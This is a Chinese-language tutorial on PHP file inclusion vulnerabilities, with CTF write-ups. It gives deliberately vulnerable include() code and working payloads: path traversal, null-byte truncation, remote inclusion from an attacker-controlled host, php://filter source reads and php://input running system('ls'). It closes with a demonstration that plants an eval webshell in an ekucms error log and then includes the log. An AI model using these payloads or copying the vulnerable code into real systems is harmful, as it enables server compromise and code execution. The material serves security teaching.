文件包含漏洞原理

1.什么是文件包含

程序开发人员有时可能重复使用函数写到单个文件中，在使用某些函数时直接调用此文件，无需再次编写，这种调用文件额过程称为文件包含。

2.php中常见的包含文件的函数

• include()
  当使用改函数包含文件时，只有代码执行到include()函数时才将文件包含进来，法神错误时会给一个警告，继续向下执行。
• include_once()
  功能与include()相同，，区别在于当重复同一文件时，程序只调用一次。
• require()
  require()与include()的区别在于require()执行如果发生错误，函数会输出错误信息，并终止脚本运行。
• require_once()
  require_once()和require()相同，区别在于当重复调用同一文件时，程序只调用一次。

几乎所有的脚本语言中都提供文件包含的功能，但文件包含漏洞在 PHP 中
居多，而在JSP、ASP、ASP.NET程序中非常少，甚至没有包含漏洞的存在。

文件包含各个脚本中代码

ASP、PHP、JSP、ASPX等

<!--#include file="1.asp"-->
<!--#include file="top.aspx"-->
<c: import url="http://thief.one/1.jsp">
<jsp: include page="head.jsp" />
<%@ include file="head.jsp" %>
<?php Include('test.php') ?>

文件包含类型

• 无限制php文件包含代码：

<?php
$filename =  $_GET['filename'];
include($filename);
?>

• 有限制php文件包含代码

<?php
$filename =  $_GET['filename'];
include($filename.".html");#强制修改后缀
?>

1.本地包含

本质是访问服务器本身已经存在的文件。或者可以上传的文件，在直到上传的目录结构下。

• 无限制情况
  本地网站目录存在文件1.txt，其里面包含php代码。当利用文件包含网页访问1.txt时，里面的php代码被执行。

http://127.0.0.1/include.php?filename=1.txt

若文件www.txt在E盘根目录下

网站目录在三级目录下

可构造访问

http://127.0.0.1/include.php?filename=../../../www.txt

• 有限制情况
  有限制的情况下，文件会被强制加上后缀，无法正常解析和执行。
  
  %00截断
  条件：magic_quotes_gpc=off,php版本<5.3.4

http://127.0.0.1/include.php?filename=1.txt%00

长度截断
条件：windows点号要长于256，linux要长于4096

2.远程包含

在php中，要实现远程包含的条件是：allow_url_include=on。
原理是通过读取自己服务器的文件，在目标服务器上进行执行。

• 无限制

http://www.xxxx.com/include.php?filename=http://xxx.xxx.xxx.xxx/x.txt

• 有限制
  可通过%20、%23、?进行截断

http://www.xxxx.com/include.php?filename=http://xxx.xxx.xxx.xxx/x.txt%00
http://www.xxxx.com/include.php?filename=http://xxx.xxx.xxx.xxx/x.txt%23
http://www.xxxx.com/include.php?filename=http://xxx.xxx.xxx.xxx/x.txt?

各种伪协议玩法

推荐：
https://www.cnblogs.com/endust/p/11804767.html

php支持的伪协议

file:// — 访问本地文件系统
http:// — 访问 HTTP(s) 网址
ftp:// — 访问 FTP(s) URLs
php:// — 访问各个输入/输出流（I/O streams）
zlib:// — 压缩流
data:// — 数据（RFC 2397）
glob:// — 查找匹配的文件路径模式
phar:// — PHP 归档
ssh2:// — Secure Shell 2
rar:// — RAR
ogg:// — 音频流
expect:// — 处理交互式的流

php.ini参数设置

在php.ini里有两个重要的参数allow_url_fopen、allow_url_include。

allow_url_fopen:默认值是ON。允许url里的封装协议访问文件；

allow_url_include:默认值是OFF。不允许包含url里的封装协议包含文件；

各协议的利用条件和方法

案例演示

1.CTF-南邮大

赛题地址：

http://4.chinalover.sinaapp.com/web7/index.php

打开界面如图：

查看网页源码，发现还有一个url，点击进去


小技巧：
此时url后面的参数是file，且值是show.php
我们直接访问show.php

发现与刚才界面显示结果相同。
即：

http://4.chinalover.sinaapp.com/web7/index.php?file=show.php
http://4.chinalover.sinaapp.com/web7/show.php

可以判断是文件包含。
通过大小写判断是什么操作系统。

大写报错，说明是linUx。
利用伪协议，执行系统命令读取index.php文件：

http://4.chinalover.sinaapp.com/web7/index.php?file=php://filter/read=convert.base64-encode/resource=index.php

利用base64解码,得到flag：

2.i 春秋百度杯真题-白盒

地址：

https://www.ichunqiu.com/battalion?t=1&r=0

打开后直接可以看见源码：

还是先判断操作系统，方便后续操作：

是linux。
接着构造，通过执行php代码获得文件目录：

http://50fd50592cdb4726bac09c6f0dadab3bf687db61f9084bfa.changame.ichunqiu.com/?path=php://input
Post：<?php echo system('ls');?>

再利用?path=php://filter/read=convert.base64-encode/resource=dle345aae.php

解码得flag：

3.ekucms文件包含漏洞

链接：https://pan.baidu.com/s/1TYTP_f4JW3ZbW14niChDxQ
提取码：qwer
本地包含一句话木马：

http://127.0.0.1/ekucms/?s=my/show/id/{~eval($_POST[orange])}

会在网站的/temp/Logs/目录下生成一个错误日志，命名规则为年_月_日

进行包含错误日志，地址：

http://127.0.0.1/ekucms/?s=my/show/id/\..\temp\logs\21_09_09.log

验证：
蚁剑可链接